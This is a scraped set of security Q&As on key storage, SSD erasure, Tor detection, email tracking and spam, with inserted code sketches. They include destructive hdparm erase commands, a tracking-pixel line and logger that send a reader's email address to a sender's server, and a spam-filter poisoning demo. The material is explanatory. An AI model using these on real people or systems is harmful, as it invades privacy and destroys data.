keys securely, but those depend on the level of security you really need. For .NET / Microsoft environment I am guessing you should be looking at DPAPI , although there may be better options out there. In one extreme, you'd need a HSM or a smartcard, but in less-stringent environments storing the key on the filesystem with the right permissions might be sufficient. It all depends on your risk profile and threats. | {
"source": [
"https://security.stackexchange.com/questions/12071",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7960/"
]
} |
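A sketch of the pattern recommended above: a fresh random IV per row, stored in the clear right next to the ciphertext, with a single key kept elsewhere. The question is about .NET, so this only shows the shape of the design, in Python with the third-party cryptography package and an authenticated mode (AES-GCM); the row format is an assumption:

import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)        # one key for the whole batch, stored outside the DB
aead = AESGCM(key)

def encrypt_row(plaintext: bytes):
    nonce = os.urandom(12)                        # per-row random IV/nonce; not secret
    return nonce, aead.encrypt(nonce, plaintext, None)    # store both columns in the row

def decrypt_row(nonce: bytes, ciphertext: bytes) -> bytes:
    return aead.decrypt(nonce, ciphertext, None)

nonce, ct = encrypt_row(b"ACME;invoice 42;1999.00")
print(decrypt_row(nonce, ct))                     # still works after a crash, as long as the key survives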
12,152 | I'm deploying a web-based ERP system for a customer, such that both the server and the client machines will be inside the customer's intranet. I was advised in another question not to use TeamViewer to access the server, using more secure means instead, and so did I. But now I'm concerned about whether or not TeamViewer would be appropriate for the client machines, which are not "special" to this system in particular, but nonetheless I don't want to lower their current security, neither I want to compromise the computer on my end. My question, then, is whether or not TeamViewer is "good enough" for simple remote desktop support, where it will be used simply to assist the users in the usage of the system, and whether or not I must take additional measures (like changing the default settings, changing the firewall, etc) to reach a satisfactory level or security. Some details: I already read the company's security statement and in my non-expert opinion all's fine. However, this answer in that other question has put me in doubt. After some research, UPnP in particular does not worry me anymore, since the feature that uses it - DirectIn - is disabled by default. But I wonder if there are more things I should be aware of that's not covered in that document. The Wikipedia article about TeamViewer says the Linux port uses Wine. AFAIK that doesn't affect it's network security, is that correct? Ultimatly, the responsibility of securing my customers' networks is not mine, it's theirs. But I need to advise them about the possibilities of setting up this system, in particular because most of them are small-medium NGOs without any IT staff of their own. Often I won't be able to offer an "ideal" setup, but at least I wanna be able to give advice like: "if you're installing TeamViewer in this machine, you won't be able to do X, Y and Z in it, because I'll disable it"; or: "you can install TeamViewer in any regular machine you want, it's safe in its default configuration; only this one *points to server* is off-limits". My choice of TeamViewer was solely because it was straightforward to install in both Windows and Linux machines, and it just works (its cost is accessible too). But I'm open for other suggestions. I'm low both in budget and specialized staff, so I'm going for the simpler tools, but I wanna make a conscious decision whatever that is. | There's a couple of differences between using a 3rd party supplier (such as teamviewer) and a direct remote control solution (eg, VNC) Team Viewer has advantages in that it doesn't require ports to be opened on the firewall for inbound connections, which removes a potential point of attack. For example if you have something like VNC listening (and it isn't possible to restrict source IP addresses for connections) then if there is a security vulnerability in VNC, or a weak password is used, then there is a risk that an attacker could use this mechanism to attack your customer. However there is a trade-off for this, which is that you're providing a level of trust to the people who create and run the service (in this case teamviewer). If their product or servers are compromised, then it's possible that an attacker would be able to use that to attack anyone using the service. One thing to consider is that if you're a paying customer of the service, you may have some contractual come-back if they're hacked (although that's very likely to depend on the service in question and a whole load of other factors) Like everything in security it's a trade-off. 
If you have a decently secure remote control product and manage and control it well then I'd be inclined to say that that's likely to be a more secure option than relying on a 3rd party of any kind. That said if the claims on TeamViewers website are accurate it seems likely that they're paying a fair degree of attention to security, and also you could consider that if someone hacks TeamViewer (who have a pretty large number of customers) what's the chance that they'll attack you :) | {
"source": [
"https://security.stackexchange.com/questions/12152",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6939/"
]
} |
12,332 | I have some data that is symmetrically encrypted with a single key in my database. Rather than hard coding it into my code, I am looking for a safer way to store the encryption key. Where can I safely store it? | Here are your possibilities, roughly in decreasing order of sophistication. Use an external Hardware Security Module. There is an entire industry of products designed for offloading security-sensitive operations to external devices. This doesn't solve the problem so much as relocate it, but it relocates it to a device that is far more secure, so altogether it's a security win. If you're doing anything high-stakes, then this is almost certainly going to factor into your solution. Tie the encryption to your hardware. In theory HSMs do precisely this, only we tend to expect a bit more sophistication from an HSM than just hardware-backed crypto. But there are cheaper options available if you don't need the throughput and compliance that a true HSM brings to the table. TPM chips were invented in part for this purpose, and many examples exist showing how to integrate with them. Additionally, dedicated crypto hardware has become fairly inexpensive, and re-purposing devices like Open-Source U2F Keys for this is simpler than it sounds. Tie the encryption key to your admin login (e.g. encrypt the encryption key with your admin login). This is only marginally useful as it requires you to be logged in in order to encrypt/decrypt anything. But on the plus side, no one can encrypt/decrypt anything unless you're logged in (i.e. greater control). Much of the secure storage in Windows works like this. Type in the encryption key when you start up, store it in memory. This protects against offline attacks (unless they capture the key out of RAM, which is tougher to do). Similar to the option above, but also different. However, the server boots into an unusable state, requiring you to manually supply the key before work can be done. Store the key on a different server. E.g. put the key on the web server and the encrypted data on the database server. This protects you to some degree because someone would have to know to grab the key as well as the database, and they'd also have to have access to both servers. Not amazingly secure, but an extremely popular option anyway. Most people who think they're doing it right do it this way. If you're considering doing this, then also consider one of the first two options mentioned above. Store the key elsewhere on the same server. Adds marginal security, but not a whole lot. Most smaller operations do this -- they shouldn't, but they do. Typically because they only have one server and it runs in some cloud somewhere. This is like taping a key to the door instead of leaving it in the lock; guaranteed to stop the most incompetent of attackers. Store the key in the database. Now you're not even trying. Still, a depressingly popular option. Many cloud-based KMS solutions (e.g. AWS , GCP , Azure ), when used most effectively, will bind your encryption to your cloud VMs or environment. The unique identity of your VM is easy for the hypervisor to establish and assert, and the KMS uses the combination of that identity and the permissions you've assigned it to allow access to an HSM-managed encryption key. This is similar to a combination of options 1 and 2, modulated to account for the ephemeral nature of Cloud VMs.
These KMS solutions are generally also compatible with the platform's other identity mechanisms, effectively tying encryption keys to login keys; a lot like option 3. | {
"source": [
"https://security.stackexchange.com/questions/12332",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8156/"
]
} |
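One common way to implement the "key lives somewhere better than the database" options above is envelope encryption: the rows are encrypted with a data key, the data key is stored only in wrapped form, and the key-encryption key stays in an HSM, a cloud KMS, DPAPI, or at least a different server. A Python sketch with the third-party cryptography package; where the KEK actually comes from is the whole point and is left as an assumption here:

import os
from cryptography.hazmat.primitives.keywrap import aes_key_wrap, aes_key_unwrap

kek = os.urandom(32)                 # stand-in for a key fetched from an HSM/KMS, never stored with the data
dek = os.urandom(32)                 # data-encryption key used on the actual rows

wrapped = aes_key_wrap(kek, dek)     # RFC 3394 key wrap; safe to keep next to the database and its backups
print(len(wrapped), "byte wrapped key")          # 40 bytes: the wrap adds an 8-byte integrity block

assert aes_key_unwrap(kek, wrapped) == dek       # at startup, fetch the KEK and recover the DEK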
12,395 | I'm looking at the results from the following URL and would like to know how the Tor Project website "knows" whether Tor is being used or not. https://check.torproject.org/?lang=en-US&small=1&uptodate=1 I would set up a packet sniffer, but since I'm not an exit node I'm not sure if that would make much of a difference. | In one line: they have a list of all the exit nodes (something like that ). In more detail: I have seen this post, which demonstrates how to detect a Tor connection in PHP: function IsTorExitPoint(){
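// TorDNSEL lookup: build <reversed client IP>.<port the client hit>.<reversed server IP>.ip-port.exitlist.torproject.org
// and treat an answer of 127.0.0.2 as "this client is a Tor exit that allows connections to us".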
if (gethostbyname(ReverseIPOctets($_SERVER['REMOTE_ADDR']).".".$_SERVER['SERVER_PORT'].".".ReverseIPOctets($_SERVER['SERVER_ADDR']).".ip-port.exitlist.torproject.org")=="127.0.0.2") {
return true;
} else {
return false;
}
}
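// Helper: flip a dotted-quad IP (1.2.3.4 -> 4.3.2.1) into the reversed ordering the exit-list zone expects.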
function ReverseIPOctets($inputip){
$ipoc = explode(".",$inputip);
return $ipoc[3].".".$ipoc[2].".".$ipoc[1].".".$ipoc[0];
} Good references explaining what it does are available here: the list of the exit nodes, and a page maintained by the Tor project that explains how to
determine if it is Tor. Update: from the official Tor documentation, which describes the TorDNSEL method that mitigates the drawbacks of the old method of testing exit-node IP lists: It is useful for a variety of reasons to determine if a connection is
coming from a Tor node. Early attempts to determine if a given IP
address was a Tor exit used the directory to match IP addresses and
exit policies. This approach had a number of drawbacks, including
false negatives when a Tor router exits traffic from a different IP
address than its OR port listens on. The Tor DNS-based Exit List was
designed to overcome these problems and provide a simple interface for
answering the question: is this a Tor exit? In ruby you have a cool Tor.rb gem that implements this technique: Tor::DNSEL.include?("208.75.57.100") #=> true
Tor::DNSEL.include?("1.2.3.4") #=> false | {
"source": [
"https://security.stackexchange.com/questions/12395",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
12,503 | I was reading another post on destroying IDE drives, and how you could remove data, wipe it, or just destroy the drive. The removed data would still be there in some state, although not easily reachable without software. Wiped data is just removed data, but it has been overwritten and is essentially gone. A destroyed disk, if done well enough, will remove everything, or make it nearly impossible to recover anything. According to my understanding. What about a solid-state drive? Can the data on one of these be recovered once deleted? It seems that this would be the way to go if you constantly dealt with and removed sensitive data, but SSDs only have so long of a life span (again, as I understand). Can data from an SSD be recovered in any way once it is removed, even if it has not been overwritten? | Yes. If you do a normal format, the old data can be recovered. A normal format only deletes/overwrites a tiny bit of filesystem metadata, but does not overwrite all of the data itself. The data is still there. This is especially true on SSDs, due to wear levelling and other features of SSDs. The following research paper studies erasure of data on SSDs: Michael Wei, Laura M. Grupp, Frederick E. Spada, and Steven Swanson. Reliably Erasing Data From Flash-Based Solid State Drives . USENIX Conference on File and Storage Technologies, 2011. One takeaway lesson is that securely erasing data on a SSD is a bit tricky. One reason is that overwriting data on a SSD doesn't work the way you'd think it does, due to wear-leveling and other features. When you ask the SSD to "overwrite" an existing sector, it doesn't actually overwrite or delete the existing data immediately. Instead, it writes the new data somewhere else and just change a pointer to point to the new version (leaving the old version laying around). The old version may eventually get erased, or it may not. As a result, even data you think you have erased, may still be present and accessible on the SSD. Also, SSDs are a bit tricky to sanitize (erase completely), because the methods that used to work for magnetic HDDs don't necessarily work reliably on SSDs (due to the aforementioned wear levelling and other issues). Consequently, utilities that are advertised as providing "secure drive erase" functionality may not be fully secure, if applied to a SSD. For instance, the FAST paper found that, in most cases, performing a full overwrite of all of the data on the SSD twice was enough to sanitize the disk drive, but there were a few exceptional cases where some of the data still remained present. There may be other reasons not to want to perform repeated overwrites of the full drive: it is very slow, and it may reduce the subsequent lifetime of the drive. The FAST paper also found that degaussing (a standard method used for sanitizing magnetic hard drives) is not effective at all at sanitizing SSDs. Moreover, the FAST paper found that standard utilities for sanitizing individual files were highly unreliable on SSDs: often a large fraction of the data remained present somewhere on the drive. Therefore, you should assume there is no reliable way to securely erase individual files on a SSD; you need to sanitize the whole drive, as an entire unit. The most reliable way to securely erase an entire SSD is to use the ATA Secure Erase command. However, this is not foolproof. The FAST paper found that most SSDs implement this correctly, but not all. In particular, 8 of the 12 SSDs they studied supported ATA Secure Erase, and 4 did not. 
Of the 8 that did support it, 3 had a buggy implementation. 1 buggy implementation was really bad: it reported success, but actually left the data laying around. This is atrociously bad, because there is no way that software could detect the failure to erase. 2 buggy implementations failed and left old data laying around (under certain conditions), but at least they reported failure, so if the software that sends the ATA Secure Erase command checks the result code, at least the failure could be detected. The other possible approach is to use full disk encryption: make sure the entire filesystem on the drive is encrypted from the start (e.g., Bitlocker, Truecrypt). When you want to sanitize the drive, forget all the crypto keys and securely erase them, and then erase the drive as best as possible. This may be a workable solution, though personally I would probably want to combine it with ATA Secure Erase, too, for best security. See also the following questions on this site: Is it enough to only wipe a flash drive once? SSD (Flash Memory) security when data is encrypted in place How can files be deleted in a HIPAA-compliant way? Have anyone tried to extract the encryption key from a SSD? | {
"source": [
"https://security.stackexchange.com/questions/12503",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6522/"
]
} |
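Following on from the SSD-erasure answer above, this is roughly what issuing the ATA Secure Erase command looks like with the Linux hdparm utility. It is only a sketch: /dev/sdX and the temporary password are placeholders, the drive must not be in the "frozen" security state (a suspend/resume cycle often clears it), and, as the FAST paper found, the quality of the drive's own implementation still has to be trusted, so verify the result where possible.

# 1. Confirm the drive supports the ATA security feature set and is not "frozen"
hdparm -I /dev/sdX
# 2. Set a temporary drive password (required before an erase can be issued)
hdparm --user-master u --security-set-pass TempPass /dev/sdX
# 3. Issue the erase (use --security-erase-enhanced instead if the drive advertises it)
hdparm --user-master u --security-erase TempPass /dev/sdX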
12,522 | When viewing some emails in Microsoft Outlook, if the sender has included images, I get the following option appear at the top of the email: "To help protect your privacy, Outlook prevented automatic download of
some pictures in this message" I am unsure how preventing the download of images in an email will protect my privacy. Is this mainly so people who might be looking over my shoulder can't see the visual contents of my email? Or is there a more technical reason; for example, to prevent the use of some kind of exploit in the image format itself (something like What is the corrupted image vulnerability? How does it work? )? If it's the latter, why would the notice specifically mention privacy, as opposed to security? I guess this last question could come down to "because the guy/girl who wrote the notice wrote 'privacy'", or even "because 'privacy' is one of those terms that the general public can relate to", but I'd be interested to know if there's more to it. | First it is important to understand what kind of images the client does not show. In your case, as the message states, these are images which would have to be downloaded. That means they are not images embedded in the email (multipart, etc.), but referenced ones (an HTML img tag, etc.). Now imagine what kind of information the sender could gain if your client downloaded an image specified by the sender from a server specified by the sender. He would get: the exact time and, very importantly, confirmation that you viewed the message at all. He could easily track you. Who could want such information, and what for? Spambots could verify that the address is valid and actively in use. ... How does it work in practice? Say you are viewing an HTML mail and it contains something like this: <img src="http://sendercontrolledserver/didviewmail.jpg?address=youremail@yourprovider" width="1" height="1" /> . Your client does not know what happens on the server when it requests that image; the resource delivered by the server doesn't even need to be an image at all, and the client has no way of knowing that before loading it. At that size you couldn't see it anyway. This is private personal information, and exposing it would be a privacy threat. | {
"source": [
"https://security.stackexchange.com/questions/12522",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6220/"
]
} |
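To make the tracking mechanism described in the answer above concrete, here is a minimal sketch of what the sender's side could run to log message opens. Everything in it is hypothetical: the port, the endpoint and the address parameter are invented for illustration and are not anything Outlook or any real mailer uses.

# pixel_logger.py -- minimal sketch of a tracking-pixel endpoint (illustrative only)
import datetime
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class PixelHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        # The sender learns the recipient, the time of the open, the client IP and the client software.
        print(datetime.datetime.utcnow().isoformat(),
              self.client_address[0],
              query.get("address", ["?"])[0],
              self.headers.get("User-Agent", ""))
        # A 1x1 GIF could be returned here; an empty 204 response is enough for logging purposes.
        self.send_response(204)
        self.end_headers()

HTTPServer(("", 8080), PixelHandler).serve_forever()

Every request to such an endpoint tells the sender which address opened the mail, when, and from where - exactly the information Outlook's image blocking is meant to withhold.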
12,531 | I'm pretty new to security, so forgive my basic question, but does SSL encrypt POST requests but not GET requests? For instance, if I have two requests GET:
www.mycoolsite.com/index?id=1&type=xyz POST site: www.mycoolsite.com/index
{
Params: id=1&type=xyz
} Is it safe to assume that someone is able to intercept the whole GET request (reading id and type), but if they intercept the POST they will be able to see the site path, but because it is going over SSL, they cannot see the params of id and type? | Now, the question is, do you know what an HTTP request looks like? Well, assuming not, here's an example of one: GET /test?param1=hello&param2=world HTTP/1.1
Host: subdomain.test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive All of this information is encapsulated within the SSL transport - as the comment on your answer kindly says. This means: GET parameters are encrypted. The HTTP body (POST parameters) is encrypted. What's not necessarily secure: The host you're asking for. Most web servers these days support Host: headers so multiple domains can be handled by one web server on one interface and IP address. Clearly, this header is encrypted; however, if you run non-HTTPS traffic to the site it should be clear which hosts you might connect to. Even if that's not the case, reverse DNS will certainly tell you what's hosted on that IP and you can probably make a reasonable guess from there. Your browser/client information. Unfortunately each HTTPS client is different and its negotiation process might give away what platform it runs on, or what browser it is. This is not the end of the world by any means; it's just a fact to understand. POST requests look similar to GET requests, except that they contain a body. It may look like this: POST /testpost HTTP/1.1
Host: subdomain.test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
param1=hello&param2=hello There are some more complicated variants, of course, but essentially it is all encrypted anyway. | {
"source": [
"https://security.stackexchange.com/questions/12531",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8280/"
]
} |
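As a small illustration of the GET-versus-POST-over-SSL answer above, the sketch below (using the question's hypothetical host and parameters) sends the same kind of GET over HTTPS with Python's standard library; the request line, including the query string, is only transmitted after the TLS handshake completes. Note that the hostname can still be learned from DNS lookups or the TLS SNI extension, and that query strings end up in server logs and browser history even though they are encrypted in transit.

# https_get_sketch.py -- the request line (path + query string) travels inside TLS
import http.client

# The hostname may still be visible to an observer via DNS or the SNI field of the
# TLS handshake; everything sent after the handshake is encrypted.
conn = http.client.HTTPSConnection("www.mycoolsite.com")
conn.request("GET", "/index?id=1&type=xyz")   # path and query string go inside the tunnel
response = conn.getresponse()
print(response.status, response.reason)
conn.close()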
12,589 | I fairly often happen across forums spammed with messages such as: Arugula (Eruca sativa) is an quarterly green, pretended or roquette.
It's been Traditional times, overclever 20 flat has be useful to
"foodie" movement.Before impediment 1990s, thrill was norm harvested
foreign wild. Colour has naturalized reactionary world, on top of
everything elseloftier Europe addition North America. Arugula is all
round Mediterranean region, wean away from Morocco and Portugal,
eastern Lebanon plus Turkey. Roughly India, adult seeds are
songeffortless Gargeer. Solvent is scour (Brassicaceae) family, rod is
quite a distance rocket, which is public ... What is the purpose behind such spam? It's annoying, yes, but one assumes that the spammer has some purpose other than to simply annoy to go to the effort of doing this. I don't see any URLs or hot links in the message, and no apparent "funny" formatting that might exploit something. Is this somehow trying to influence web crawlers? (And, if so, to what purpose?) Does it somehow exploit some sort of weakness in the forum software? What? Added: Not really related to the original question -- more of a tangential comment, but I thought it would be worthwhile to keep it in the same place, in case someone else comes looking: The nature of the "strange" posts on the forum I'm mainly thinking about ( http://forums.finehomebuilding.com/ ) has largely changed. What we get now (once/twice a week) are posts that parrot details from previous posts in the thread (often a very old thread), or perhaps details gained from a web search on the thread's topic, but they are generally pointless (at best a "me too" nature) and the English, while technically proper, is a hair stilted and clearly not that of an English speaker (neither British, American, Indian, nor African, all of whose dialects I'm at least passingly familiar with). My best guess is that these are people, probably in China, who are learning English and are using the forum as a sort of test, to see if their post goes undetected. I don't know, however, if this is simply a game, a test for an English class, or a test/practice for a wannabe spammer. (It's unlikely that they're trying to "curry favor" with the spam filter, as the thing ("Mollom") is notoriously flaky and happily lets spam through on the first try while rejecting legitimate posts.) But wait -- there's more!! For about the past year the forum of which I speak has been regularly (at least weekly, and sometimes several times a day -- twice so far this morning) bombarded with posts such as: Kitchen Units For Sale. Thirty Ex Display Kitchens To Clear.
www. e x d i s p l a y k i t c h e n s 1 .co.uk £ 595 Each with appliances. (URL slightly corrupted so as to not encourage these folks.) Apparently this is a major spammer operating out of Europe (and our forum is about 99% US-oriented), so it's pointless at best. The oddest thing is that the constant spamming has apparently "poisoned" the URL for Google (and likely other search engines) such that you have to pretty much spell out the URL to get a "hit". (The other odd thing, of course, is that the system operators seem incapable of blocking this, even though the URL is always the same.) Another question -- Since, as I observed earlier, the "kitchen spam" posts (seen on dozens of other BBs as well) have apparently "poisoned" the associated web site for Google, is it possible that the spam is actually intending to do this, and is instigated by someone (a competitor?) who wishes ill for that web site? | They are trying to do Bayesian poisoning. By sending lots of correct words and a few words which are used in spam, like viagra, those words get a lower spam notification (over time). This means that after a while they can get real spam with links through to the filter. | {
"source": [
"https://security.stackexchange.com/questions/12589",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8333/"
]
} |
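A toy sketch of the Bayesian-poisoning idea from the answer above. The per-word spam probabilities are invented for illustration, and real filters (token databases, training feedback, more careful probability combining) are considerably more elaborate; the point is only that padding a message with innocuous words drags the combined score down.

# bayes_poison_sketch.py -- toy model of how ham-looking filler dilutes a spam score
# The per-word probabilities below are invented for illustration.
spam_prob = {"viagra": 0.99, "pills": 0.90, "arugula": 0.20, "harvested": 0.10,
             "mediterranean": 0.15, "europe": 0.20}

def spam_score(words):
    # Combine per-word spam probabilities the way naive Bayesian filters do.
    s, h = 1.0, 1.0
    for w in words:
        p = spam_prob.get(w, 0.4)           # unknown words treated as mildly hammy
        s *= p
        h *= (1.0 - p)
    return s / (s + h)

print(spam_score(["viagra", "pills"]))                      # roughly 0.999: flagged
print(spam_score(["viagra", "pills", "arugula", "harvested",
                  "mediterranean", "europe"]))              # roughly 0.52: diluted by filler

If recipients also end up marking such padded messages as legitimate, the filter's training data degrades further, which is the longer-term aim the answer describes.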
12,593 | Recently my PHP-based website got infected with malware (probably via a stolen FTP password). Basically, every 30 minutes a file frame_cleaner_php.php was uploaded, an HTTP GET was done on it to execute it, and it was removed. I was able to intercept a copy of the file and analyze it. It was not obfuscated in any way and was quite easy to read. In essence it recursively scanned all PHP files, looked for 20 signatures of infections by other common malware (like <?php eval(base64_decode(" or <?PHP # Web Shell by oRb ) and crudely removed the lines with that infection. Because of a false positive some lines in my own PHP files were removed, causing the site to go down. This was probably just an unintended side effect of the malware. The big question: why would malware do this, what is there to gain? | There are two explanations, as I see it. Fight over the box Each piece of malware wants to single-handedly own the box and not share it with others. It will therefore try to patch the system, remove other malware, and leave a backdoor for its creator. Ethical worms Malware that spreads only to patch and remove other malware is often referred to as "white worms" or "ethical worms". These types of worms raise so many liability issues that they are rarely seen. 2022.04.17 edit: Anti-forensics, anti reverse-engineering Malware could also end up on a system by mistake; infected by accident, the attackers would want to remove it to prevent analysis. | {
"source": [
"https://security.stackexchange.com/questions/12593",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7319/"
]
} |
12,596 | Provided that the hacker knows the WiFi password if any (WEP or WPA), is he capable of sniffing network data of other hosts connected to the same access point? | If an attacker has the password, then they could, for example, use Wireshark to decrypt the frames . (Note, however, there's no need to have a WEP password since it is a completely broken security algorithm. WEP keys can be extracted from the encrypted traffic by merely capturing enough packets . This usually only takes a few minutes. Also, keep in mind that not all APs are built the same. Some can direct the RF beam in a much more focused way. Therefore, although you may be connected to the same AP, you may not be able to see all of the other traffic.) | {
"source": [
"https://security.stackexchange.com/questions/12596",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4508/"
]
} |
12,659 | Even since growing up, I've watched films in which the "bad guy" is repeatedly tracked down when they call the police or FBI or police force de jour. They always have "about 30 seconds". Regardless of whether those specific realizations are accurate or not, I've never understood what is going on technically when a phone is traced. This question has three related parts: What are the technical aspects to tracing a phone call; is it more difficult for mobile phone? Is it more difficult if the phone is on, but not actively being used to call? Why are the tools necessary to trace phone calls not available to the general-public? We have traceroute to find routing information for IPs -- why not phones? Is it a question of specialized equipment, access to telecom systems, etc. or more social? How does one prevent a (mobile) phone from being traced? | What are the technical aspects to tracing a phone call; is it more difficult for mobile phone? In the old days, signaling was inline, hence the 2600hz hack. Calls were setup as one switch talked to another, then another, and so on until a circuit was established end-to-end. In the modern age, everything is out-of-band over SS7 and every switch is lined up at the same time. The calling station is identified at the start and no tracing is really necessary. Mobile phones do take more effort because a mobile number isn't attached to a given switch. Thus, while the far end knows what the number is, where it is involves extra technology. The cellular phone company can identify what towers the phone is associated with and thus instantly know the region it is in. Further narrowing can be done based on signal strength comparisons, which of the tower's directional antennas are holding the signal, and GPS chips in phones. Is it more difficult if the phone is on, but not actively being used to call? Only a custom phone would act in a way where it didn't respond to the tower asking a question, so generally no. Why are the tools necessary to trace phone calls not available to the general public? We have traceroute to find routing information for IPs -- why not phones? Is it a question of specialized equipment, access to telecomm systems, etc. or more social? Social legacy and equipment access. The Internet doesn't have a separate signaling band and is based on the idea of independent operators controlling where their traffic goes. The phone company is based on the legacy of one company running the show. Switch access in the phone world is internal only to the phone company or whoever they want to specifically include. The Internet, on the other hand, doesn't really have a way of considering nodes special since everything is in the same band. How does one prevent a (mobile) phone from being traced? Nothing will save you from being traced down to the tower you're using, but you can really screw around with the triangulation metrics by using a directional antenna and some weak false associations or intermediary transmission layer such a radio that links you to your phone. In that case, finding your phone would leave the person chasing you still lacking a physical connection and having to trace something else. Done right, you can turn the default, "Within 100 feet," into, "Somewhere in this 20 square mile cone." That is a big time, knowledge, and equipment cost commitment, though. You may also find some success in delaying tracing by using intermediate PBX systems to mask the actual caller. 
If you have dial-in access to a company's PBX, the trace will stop there and somebody will have to look at logs of associated calls into the system to try and correlate the responsible line. Nest a few of those and you may buy some time. You'll probably still eventually be traced no matter how short the call was, but it will no longer be instant. | {
"source": [
"https://security.stackexchange.com/questions/12659",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6249/"
]
} |
12,664 | DuckDuckGo is a search engine that claims it will not share your results with others. Many of my skeptical coworkers think it may be a scam. Is there any proof that any web search engine will protect your privacy as it advertises? | There is no proof that DuckDuckGo operates as advertised. (There never is, on the web.) However, that is the wrong question. DuckDuckGo is very clear in its privacy policy . DuckDuckGo says it doesn't track you , it doesn't send your searches to other sites , by default it does not use any cookies , it does not collect personal information , it does not log your IP address or other information about your computer that may be sent automatically with your searches , it doesn't store any personal information at all . Those are pretty strong promises, with no weasel-wording. And, as far as I can see, DuckDuckGo's privacy policy seems like a model privacy policy. It is a model of clarity, plain language, and lack of legal obfuscation. And privacy policies have bite. The FTC has filed lawsuits after companies that violate their own advertised privacy policy. (Not just little companies you've never heard of: They even went after Facebook!) The way privacy law works in the US is, basically, there are almost no privacy rules that restrict what information web sites can collect -- except that if they have a privacy policy, they must abide by it. Breaching your own privacy policy may be fraud, which is illegal. Also, violating your own privacy policy represents "unfair or deceptive acts or practices", and the FTC is empowered to pursue anyone who engages in "unfair or deceptive acts or practices" in court. DuckDuckGo would be pretty dumb to breach their own privacy policy; their privacy policy is clear and unambiguous and leaves them little wiggle room. No, I don't think that DuckDuckGo is a scam. I think that's crazy talk. Given the incentives and legal regime, I think you should assume DuckDuckGo follows their own privacy policies, until you find any information to the contrary. | {
"source": [
"https://security.stackexchange.com/questions/12664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
12,701 | I have a bunch of Linux machines that I wish to administer over the Internet. I currently use SSH keys, but have been advised to use 2-factor authentication. SSH Keys are something you know. Is an IP address something you have? (Yes, IP can be spoofed, but so can biometrics and so can atm cards). Could I lock down SSH to only allow connections from my IP range and would that be considered 2-factor in conjunction with SSH keys? | I would think of an IP address as being "somewhere you are" rather than any of the traditional "something you know", "something you have" and "something you are" that are part of 3-factor authentication. Although IP addresses are trivial to spoof, TCP connections are not and SSH is a protocol built on top of TCP. The IP address of a TCP connection is a reliable indicator of who you are directly connected to. Let's say I limit SSH connections to just my office IP address, an attacker is going to have to do one of: Be in or near (if he cracks the wireless) my office Be on the path between my office and my server (say inside our ISP). Control a machine within my office. Point 3. allows the attacker to be anywhere in the world but it increases the difficulty of an attack. Points 1. and 2. significantly reduce the number of people who can successfully use the other factors (such as your SSH key or password) if they manage to acquire them and hence I see it as being worthwhile. The quality of the IP address is a big factor here. I used my office as the example above but if you have a dynamic IP address, do you trust the entire range your ISP owns? How does that affect how easy it is for an attacker to get one of those IP addresses? Does the trustworthiness of an IP address change when you know there are 10 machines hidden by NAT behind it? What if there are 2,000 machines and 100 wireless access points? I would not consider an IP address to be a factor on its own. | {
"source": [
"https://security.stackexchange.com/questions/12701",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1450/"
]
} |
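As a concrete sketch of the "lock SSH down to an address range" idea discussed above: OpenSSH lets you bind a key to source addresses directly in authorized_keys. The 203.0.113.0/24 range below is a documentation placeholder - substitute your own office range - and a firewall rule restricting port 22 to the same range gives an equivalent check one layer lower.

# ~/.ssh/authorized_keys -- this key is only usable from the listed source range
from="203.0.113.0/24" ssh-ed25519 AAAAC3NzaC1...rest-of-public-key user@laptop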
12,740 | I know this is tin-foil hat fodder, but at least one judicial opinion referenced a bug that could track/listen in on the subject "whether the phone
was powered on or off," although that may have been a judge misinterpreting the technobabble spouted at him, or an FBI agent overhyping their tech to the judge. It seems like with smartphones all the rage now, it would be possible, e.g. to create a root kit that would simply mimic the phone entering a powered down state while still transmitting, although this would have an obvious effect on battery life unless it actually powered down most of the time and just woke up to transmit basic location information in a heartbeat configuration. Is there anything similar out there in use by either "good guys" or "bad guys" that you know of? | A Korean researcher demonstrated this on Samsung Smart TVs at Black Hat this year. ( Slide deck here .) He mentions that the malware was originally designed for cell phones, and that TV sets were even easier to attack because battery life did not give them away. His basic premise is that if he owns your device, he owns the power indicators, too. Remote power-on isn't a problem when it's never actually powered off. | {
"source": [
"https://security.stackexchange.com/questions/12740",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8453/"
]
} |
